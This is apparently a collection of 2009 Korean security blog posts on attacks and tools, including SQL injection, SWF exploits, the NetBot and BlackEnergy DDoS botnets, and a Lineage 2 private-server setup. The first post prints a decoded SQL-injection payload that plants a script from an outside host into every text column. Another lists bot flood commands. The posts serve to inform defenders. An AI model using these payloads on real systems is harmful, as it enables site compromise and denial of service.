    CAST 구문은 타입을 다른 타입으로 Convert 시켜주는 역할을 한다.
    CAST 된 구문은 "@S"의 Input 되고 실행이 된다.

    이 코드를 아래 펄 명령어를 사용해서 디코딩한 것이 다음과 같다.

    $ perl -pe 's/(..)00/chr(hex($1))/ge' < input > output


    [디코딩 결과]

    declare @m varchar(8000);set @m='';select @m=@m+'update['+a.name+']set['+b.name+']=rtrim(convert(varchar,'+b.name+'))+''<script src="http://yl18.net/0.js"></script>'';'
    from dbo.sysobjects a,dbo.syscolumns b,dbo.systypes c where a.id=b.id and a.xtype='U'and b.xtype=c.xtype and c.name='varchar';
    set @m=REVERSE(@m);set @m=substring(@m,PATINDEX('%;%',@m),8000);set @m=REVERSE(@m);exec(@m);


    이 SQL 구문은 sysobject 테이블을 type U(User) 테이블의 모든 row를 가져오는 것이다.
    결국 각 오브젝트에 yl18.net. 사이트 주소 코드를 추가하도록 업데이트 명령을 실행 시키는 구문이다.
    이 공격을 받은 웹 사이트는 IIS와 MS SQL 서버가 설치된 경우이다. 특히 주목할 것이 바로 Evading을 하기 위해서 CAST나 CONVERT 명령어를 쓴다는데 유의해야 한다.

    [원문]

    Published: 2008-01-09,
    Last Updated: 2008-01-09 09:05:44 UTC
    by Bojan Zdrnja (Version: 1)
    http://isc.incidents.org/diary.html?storyid=3823



    2009/08/11 14:21 2009/08/11 14:21
    트렌드마이크로에서 사용자 PC의 bot 같은 Activity를 모니터링하는 간단한 툴입니다.

    [다운로드]
    http://www.trendsecure.com/portal/en-US/tools/security_tools/rubotted


    2009/08/11 14:20 2009/08/11 14:20

    워낙 중국 해커들 게임해킹 실력은 장난이 아니라서 왠만한 게임분석은 어렵지 않게 합니다.
    옛날 중국애들이 분석한 리니지2 (천당2)의 게임를 분석한 내용입니다. 대충 보시면 어떻게 구성되고 구동되는지 짐작할 수 있습니다.

    必备条件:
    1、操作系统 Windows 2003 Enterprise Edition
    2、数据库   Microsoft SQL Corpotation 2000+SP4
    3、天堂II服务端程序

    L2server.exe  及其相关配置文件
    L2NPC.exe    及其相关配置文件
    L2AuthD.exe  及其相关配置文件
    Cached.exe  及其相关配置文件
    Html 以及 Scrip t脚本目录
    GeoData  地图文件
    Patch.dll  四章功能扩展文件

    4、数据库脚本
    ① lin2comm_new(IP) 脚本内包含服务器IP地址、数据库访问用户名(gamma)、对应用户名的密码用记事本打开修改一下
    ② 1_lin2db
    ③ 2_lin2db_update
    ④ lin2report
    ⑤ lin2user
    ⑥ 1_lin2world 脚本内包含服务器IP地址、数据库访问用户名(gamma)、对应用户名的密码 用记事本打开修改一下
    ⑦ 2_lin2world(这个是四章的第二个Lin2world库的脚本)

    [boot loader]
    timeout=30
    default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
    [operating systems]
    multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Windows Server 2003, Enterprise" /fastdetect /3GB
    减少lin2server停止错误(加完/3GB以后不要加载任何启动程序例如:防火墙系统容易蓝屏需要启动安全模式下删除启动程序)

    之前请先确认你从来没有运行过服务器端的应用程序,如果运行了,请运行regedit删除
    [HKEY_LOCAL_MACHINE\SOFTWARE\NCSOFT]
    [HKEY_LOCAL_MACHINE\SOFTWARE\PROJECT_L2]
    这两个键值,如果没有运行过轻跳过这一步,进入下面的步骤

    调整好了操作系统之后就可以开始安装SQL了。SQL的安装过程就不用我多说了吧?自己记住SA的密码就好了。
    安装好SQL之后打开企业管理器依次创建 Lin2comm Lin2db Lin2report Lin2user Lin2world这5个数据库。创建好了之后进入安全性--〉登陆 创建一个名为gamma的用户,然后在创建窗口最上面选择数据库访问标签。依次给Lin2comm Lin2db Lin2report Lin2user Lin2world这5个数据库选中Public以及db_owner角色。5个数据库全都要选择这2个角色。然后点确定,再次输入Gamma的确认密码就Ok了。

    将Patch.dll复制到windows\system32 并且设置只读属性。

    然后去ODBC建立文件DSN。过程:选择文件DSN标签--〉添加---〉SQL Server---〉下一步---〉数据源名字(和数据库名字一样就OK了。一共5个。)---〉剩下的一路填写相关信息就建立好了。对应5个数据库全部都要建立。

    之后建立系统DSN,一共2个,一个指向Lin2db 一个指向Lin2world 使用Windows NT验证方式。

    然后打开SQL的查询分析器,输入gamma的用户名和密码,对应每个数据库打开数据库脚本,然后执行就OK了。
    注意:Lin2db和Lin2world都有2个脚本。按照顺序依次执行查询。

    数据库脚本查询后的重要一步,打开lin2d库中的server表,填入以下内容
    PS:此处填写的两个IP地址第一个是外网IP地址,第二个是内网IP,如果不开内网就写外网的。都不能使用域名。为什么别问我,NCsoft说了算。
    1   名字   服务器ip   服务器ip   1   1   1   端口
    1   XXWZ   222.222.222.222   222.222.222.222   1   1   1   7777

    现在开始配置服务器端的配置文件

    NewAuth\etc\config.txt

    serverPort = 2104
    serverExPort = 2106
    serverIntPort = 2108
    worldport = 7777
    DBConnectionNum=10
    encrypt = true
    numServerThread = 2
    numServerExThread = 2
    numServerIntThread = 2
    logDirectory="d:\l2serverwork\log"
    ;30206 : l2, 30310 : Sl
    ProtocolVersion = 30810
    ;8:lineage2, 4 halo
    GameID=8
    DesApply=false
    PacketSizeType = 3
    ReadLocalServerList=false
    OneTimeLogOut=true
    CountryCode=3
    DevConnectOuter=true
    DevServerIP="222.222.222.222" <---此处填写外网IP地址
    下面内容省略了。都一样。


    L2Server\l2server.ini

    [CacheD]
    address="222.222.222.222" <---此处填写外网IP地址
    port=2006

    [AuthD]
    ;l2server
    address="222.222.222.222" <---此处填写外网IP地址
    port=2104

    [World]
    WorldId=3
    UserLimit=1500 <---此处是服务器连接最大数限制
    ;LetBuilder=1

    [PetitionD]
    address="222.222.222.222" <---此处填写外网IP地址
    port=2107
    WorldName="publish03"
    ;world name must be exact 9 characters.

    [Report]
    Interval=50   <---此处是报告时间,调的长一点可以节约资源

    [Setting]
    country=3
    UserPathFind=false
    WorldCollision=false
    ExceptionMailing=false
    MailServer=mail.ncsoft.co.kr
    AcceptLowerProtocol=true
    IOBufferCount=6000   <---此处是个重要的参数,机器越差请调整的越低
    ;limit hour for week, (number means hour. 0 means don't use. default is 0)
    playtimelimit=0

    reconnectauth=1
    ;use auth reconn (1:use, 0:don't. default is 0)这里填写0为服务器维护 1为正常开启

    www.5 uwl.net
    L2NPC\ L2NPC.ini

    [CacheD]
    address="222.222.222.222" <---此处填写外网IP地址
    port=2008

    [Server]
    address="222.222.222.222" <---此处填写外网IP地址
    port=2002

    [db]
    address="222.222.222.222" <---此处填写外网IP地址
    port=2005
    user="gamma"     <---此处填写数据库用户名
    password="xxxxxxx"   <---此处填写数据库密码

    [map]
    directory="geodata"

    [LogD]
    address="222.222.222.222" <---此处填写外网IP地址
    port=3999

    [World]
    WorldId=3

    [Setting]
    country=3
    ExceptionMailing=false
    MailServer=ncs-mail.ncsoft.co.kr

    全部配置完成后,请依次运行运行:

    CacheD--------------------第1个启动
    第一次输入
    File DB:lin2world
    Log Name:gamma
    Passwoed:你的gamma密码
    第二次输入
    File DB:lin2comm
    Log Name:gamma
    Passwoed:你的gamma密码
    NewAuth------------------第2个启动
    File DB:lin2db
    Log Name:gamma
    Passwoed:你的gamma密码
    L2Server------------------第3个启动
    L2NPC--------------------第4个启动




    2009/08/11 14:18 2009/08/11 14:18

    최근 Zone-h.org에서 이슬람 해킹 툴에 관한 흥미로운 기사가 하나 있었습니다.
    이슬람 해킹은 우리에게는 아직은 낯설게 느껴지고 있습니다.
    무자헤딘 비밀2(Mujahedeen Secrets)라고 하는 툴에 관한 이야기 입니다.
    이 툴은 글로벌 이슬람 미디어 프론트(Global Islamic Media Front)라는 단체에서 배포하는 암호화 툴이라고 합니다.
    "Asrar Al-Mujahidin" 또는 "Mujahedeen Secrets"라고도 하며 알카에다나 탈레반이 인터넷으로 통신할 때 게시판 내용, 메신저나 채팅 내용을 암호화시켜주는 툴입니다.  
    이 프로그램은 멀티케스트 이슬람 네트워크 망을 보호하고 그 포함되는 모든 컨텐츠들을 아주 작은 사이즈로 암호화 시켜준다고 합니다.

    글쎄 AES는 미국 NIST에서 만든 암호 알고리즘인데 암호화 알고리즘을 미국 걸 쓴다니 아이러니합니다. 이것으로 미국의 강력한 인터넷 도청을 피할 수 있다고 생각하고 있는 것은 아닌지..

    1) 첫번째 버전에 포함된 기능   

    - 5가지의 강력한 암호화 알고리즘(AES finalist algorithms)
    - symmetrical encryption keys 256-bit (Ultra Strong Symmetric Encryption).
    - encryption keys for symmetric length of 2048-bit RSA (private and public).
    - ROM 압축(compression) (highest levels 압축)
    - stealthy ciphering
    - cipher auto-detection.
    - sile shredder

    2) 두번째 버전에 포함된 기능

    - messaging 보호
    - files to text encoding
    - checking digital signatures of files
    - creating digital signature of the file




    2009/08/11 14:18 2009/08/11 14:18

    2006년 뉴질랜드의 한 보안 컨설턴트가 발견한 방법이라고 합니다. 아직 패치는 나오지 않은 상태이고 Windows XP가 화면 잠김 상태일때 패스워드 없이도 Unlock 시킬 수 있는 툴을 하나 만들어서 발표을 한 모양입니다. Firewire라는 걸 이용한다고 합니다.


    원문)
    http://www.smh.com.au/news/security/hack-into-a-windows-pc--no-password-needed/2008/03/04/1204402423638.html

    주) Firewire란
    미국 애플 컴퓨터 회사와 텍사스 인스트루먼트(Texas Instruments)사가 공동으로 제창한 고속 직렬 데이터 버스 규격. 케이블의 전기적 특성이나 접속기의 형상 등 물리적인 부분에 대해서 결정된 규격으로, 후에 IEEE 1394로 규격화되었다. IEEE 1394는 주로 PC와 AV 기기의 접속을 상정한 통신 규격으로서 디지털 동화상 전송 등을 의식해서 만든 것이다. ‘Fire-Wire’라는 명칭은 ‘불에 타서 연기가 올라가는 만큼 빠른 속도’라는 의미에서 붙여졌다.

      IEEE 1394의 규격은 파이어와이어 400과, 800이 있는데 각각 약 100/200/400Mbps, 800Mbps의 전송 속도를 지원한다. 두 규격은 모두 핫 플러깅을 지원한다.
    IEEE 1394, 혹은 파이어와이어(FireWire), 아이링크(i.Link)는 같은 말이다.




    2009/08/11 14:17 2009/08/11 14:17

    해킹기술은 눈부신 정도로 엄청난 기술 발전를 가져오고 있다.
    이제는 직접 서버를 해킹하지 않아도 해킹할 수 있는 기술들이 속속 등장하고 있다. 인터넷 곳곳이 다 지뢰밭인 셈이다.
    웹서핑할 때 마다 악성코드가 숨겨진 것이 없는지 부비트랩이나 함정 탐지하듯 해야 하는 시대가 되가고 있다.
    해킹기술의 최고 정점은 Human Hacking이다.

    Did you know that humans get Hacked as much as computers?
    It is called social engineering and it has been happening long before computers ever existed!
     
    바로 사회공학적인 공학기법이다. 컴퓨터가 존재하기도 전에 이 방법은 존재했었다.

    1. Hacking Humans

    Social engineering is the human side of breaking into a corporate network. Companies like ours with authentication processes, firewalls, VPNs and network monitoring software are still wide open to an attack if an employee unwittingly gives away key information in an email, by answering questions over the phone with someone they don't know or failing to ask the right questions.


    2. Social Engineering, an Example
    AOL experienced a social engineering attack that compromised their system and revealed confidential information of more than 200 accounts. In that case the caller contacted AOL's tech support and spoke with an employee for an hour. During the conversation the caller mentioned that his car was for sale at a great price. The employee was interested, so the caller sent an e-mail attachment with a picture of the car. Instead of a car photo, the mail executed a backdoor exploit that opened a connection out from AOL through the firewall. Through this combination of social engineering and technical exploitation, the caller gained access to the internal network.


    3. Forms of Social Engineering
    Social engineering is not limited to phone calls; many organizations have reported cases involving visitors impersonating a telephone repair technician requesting access to a wiring closet or a new member of the IT department needing help accessing a file.

    People, for the most part, look at social engineering as an attack on their intelligence and no one wants to be considered "ignorant" enough to have been a victim. It's important to remember that no matter who you are, you are susceptible to a social engineering attack.

    If you suspect social engineering – don't be afraid to ask questions and/or notify your IT department. If a caller requests information that is technical in nature, please refer them to your IT department.


    [원문]
    http://www.auditmypc.com/freescan/readingroom/social-engineering.asp




    2009/08/11 14:16 2009/08/11 14:16
    웹 사이트의 검색부분은 보통 SQL SELECT 구문의 LIKE절에 들어가게 됩니다. 이 공격은 LIKE절에 Wildcard 문자들을 무작위를 입력하여 SQL 서비스 퍼포먼스를 떨어드리는 새로운 형태의 서비스 거부 공격입니다.

    [다운로드]





    2009/08/11 14:11 2009/08/11 14:11
    We have discovered one interesting technique to hide malicious code from researchers.

    --> 우리는 보안연구자들에게서 악성코드를 숨기는 재미난 기술을 한가지 발견했다.
    The initial infection was common iframe injection on a web page. The iframe page loaded tiny shockwave file, which was only 158 bytes long!

    --> 초기 감염방식은 일반적인 웹페이지 iframe 삽입이다. iframe 페이지는 아주 조그만 쇼크웨이브 파일에 실행이 되는데 그 크기 딱 158바이트이다
     
    This file uses internal ActionScript global variable ("$version") to get the version of user's OS and plugin for handling Shockwave files.
    --> 이 파일은 내부의 ActionScript 전역변수("$version")로 사용자 OS 버전정보를 가져오거나 쇼크웨이브 처리하는 플러그인에 사용된다.

    사용자 삽입 이미지


    The $version variable evaluates to something like "WIN 9,0,12,0", which is short platform name, version and revision numbers of Adobe Flash Player plugin. After that 4561.SWF tries to download and run another .SWF basing on this string. In the case above it tried to download "WIN 9,0,12,0i.swf" file.

    The server replied with famous ERROR 404: “File Not Found”. But that was done for purpose. If the 4561.swf file was tested
    --> 서버는 ERROR 404:"File Not Found"로 응답한다.  그러나 그것이 사실상 의도된대로 수행되어 진 것이다.
    on an automated sandbox a researcher may have not notice the fact that unavailability of the second .SWF file was not due to the absence of malicious code on the server, but due to the different Adobe Flash Player plugin that was used in the sandbox.

    I have checked all the possible versions and found 6 different .SWF exploits.
    --> 6개의 .SWF 해킹코드를 발견했다.

    WIN 9,0,115,0i.swf
    WIN 9,0,16,0i.swf
    WIN 9,0,28,0i.swf
    WIN 9,0,45,0i.swf
    WIN 9,0,47,0i.swf
    WIN 9,0,64,0i.swf

    The files were already detected by our engine as Exploit.SWF.Downloader.c but they were new variations and were not in malware collection. The first sample of Exploit.SWF.Downloader was detected on 2008-05-27.

    This exploit uses a vulnerability of Adobe Flash Player, built on incorrect image size handling. I discovered embedded jpeg data with wrong image size inside.


    사용자 삽입 이미지



    So, to draw the line, I would like to repeat that this technique allows to carefully download specific exploits for specific version of the vulnerable Adobe Flash Player plugin and at the same time allows to hide the actual malicious code from curious researchers.

    나머지는 번역하기 넘 귀찮아서 천천히 할게요 ^^


    2009/08/11 14:08 2009/08/11 14:08
    국내 DB 보안 제품인 사크라를 만든 웨어벨리에서 최근에 만든 DB 취약점 스캐너인 Cyclone입니다.
    트라이얼 버전을 사용해 보고 있는데 괜찮게 잘 나오는 것 같습니다.
    DB 취약점이 다소 어려운 면이 있는 것도 사실입니다. 사실 DBA는 취약점 자체가 뭘 의미하는지 모르기 때문입니다.
    과연 그럴때는 어떻게 접근해야 할 까 참 고민을 많이 하게 됩니다.
    사용자 삽입 이미지
    사용자 삽입 이미지



    2009/08/11 14:03 2009/08/11 14:03

    작년에 아이템베이등 국내 아이템 거래 사이트를 초토화 시키고 최근에 웹 사이트를 대상으로 하는 랜섬어택으로 DDoS를 많이 당하고 있는데 사용된 툴이라고 합니다,
    아래 사이트에서 공격 데모를 보여주고 있습니다.
    데모 화면을 보시면 중국해커 PC에 어떤 프로그램이 설치되어 있는지 그리고 주로 무슨 툴을 사용하는지도 엿볼 수 있습니다.
    여기서 해커의 성향을 엿볼 수 있는데 지금 데모를 하는 중국해커는 공격성향이 강한 사람 같습니다. 데모지만 실제 서비스 사이트에 대해 주저하지 않고 공격을 해버립니다.
    근데 한가지 의문은 데모에서 단지 5대의 좀비 PC로 웹 서버가 죽는게 이상합니다. 5대 좀비 PC 가지고 대량의 트래픽 발생한다는 것은 불가능한데도 웹 서버가 죽는 것 보면 뭔가 특별한 DoS 공격인 것 같습니다.
    잘 보시면 DoS 공격 타입이 CC Attack 타입을 선택하고 있습니다. 이 부분이 핵심입니다.
    PC 화면에 보니 syser, MS VC++, GMER, FBFD.EXE, ooBar2000.exe, Samsung PC Studio3(삼성 휴대폰 연결프로그램), 중국어로 된 각종 기능을 알 수 없는 프로그램들...   아래 화면을 보시면 NetBot Attacker에서 아이피 주소와 한국이라는 도메인이 나오는 부분이 있는데 이게 바로 자동으로 좀비 PC가 해커 PC로 리버스 커넥션한 좀비 PC 리스트입니다. 그리고 옆에다 찍으면 그 좀비 PC가 공격하는 형태입니다.

    해킹은 확실히 공격하는 측보다는 막는 측이 불리합니다.
    DDoS 공격툴은 확실히 가난하지만 사악한 Hacker자들이 선호하는 무기입니다.

    http://www.hackeroo.com/move/netbot_attacker.html

    (1) NetBot Attacker 1.6 Public 버전(이 프로그램이 필요하다면 돈주고 사라고 합니다)

    사용자 삽입 이미지

    사용자 삽입 이미지

    (2) NetBot Attacker 2.3 VIP 영문버전(이 버전은 구하기 쉬지가 않음)

    좌측 상단은 좀비 PC 리스트이고 우측 하단은 원격에서 쉘로 좀비 PC에 들어가 있는 것으로 추정되고 좌축 하단은 FTP로 파일 업로드 다운로드 하는 매니저 프로그램이다.

    사용자 삽입 이미지

    이 툴만 있으면 반대로 국내에 좀비 PC를 찾아내는 것이 더 쉬울 듯 합니다. 그러나 일부 좀비 PC가 하나의 가치로 평가되어 Botnet정보가 거액으로 거래된다고 합니다.
    NetBot Attacker 2.3 VIP 영문 버전을 구하는 사람은 대박입니다.

    (3) 국내외에 좀비 PC 리스트를 한눈에 확인할 수 있다.

    사용자 삽입 이미지
     



    2009/08/11 13:59 2009/08/11 13:59
    IRC기반의 botnet이 아닌 웹기반의 botnet으로, 러시아의 해커가 만들었다. C&C(Command & Control) 서버(명령을 내리고, 조종하는 서버. BlackEnergy에서는 웹 페이지가 이에 해당)는 러시아나 말레이지아에 위치에 있으며, 주로 러시아를 공격 대상으로 한다.

    BlackEnergy는 크게 2가지로 구성되어 있다.

    1. 웹기반의 C&C를 제공한다. (php+MySQL)
    2. DDoS공격 bot을 생성하는 툴(builder.exe)을 제공한다.
       builder.exe 툴을 이용하여 웹기반 bot관리 서버로 접속하는 바이너리파일을 생성할 수 있게 된다.
    사용자 삽입 이미지

    [ 이미지 출처 : 글 끝에 소개한 URL ]

    bot 바이너리는 지정한 C&C서버로 접속하게 된다. 그리고, bot과 제어서버간의 명령은 웹을 통해서 이뤄지게 되며, 구조는 대략 이렇다.

    1. bot은 C&C 서버의의 URL(예. http://웹서버/경로/stat.php )을 체크하게 된다. 이 때 id, build_id 값을 POST방식으로 넘긴다.
    2. 서버에서는 명령 등의 상태 값을 BASE64 인코딩된 값으로 리턴을 한다. 그 값에 따라서 bot은 명령을 수행한다.
       다양한 공격 유형이 있는데, ICMP flood, TCP SYN flood, UDP flood, DNS flood, http 요청 등이 있다.
       'flood http foobar.com a.html' 명령을 내린다면 foobar.com/a.html을 계속 호출하게 되며, 'flood syn foobar.com 80'은 TCP SYN flood를 발생한다.

    PC에 설치된 bot에 대한 작년 10월 백신 검사 결과를 보니 V3, clamAV, AVG, McAfee 등은 이 바이너리를 못 찾아내고, F-Secure, F-Prot, Kaspersky는 찾아냈다.

    보다 자세한 정보는 'BlackEnergy DDoS Bot Web Based C&C'에서 볼 수 있다.



    2009/08/11 13:45 2009/08/11 13:45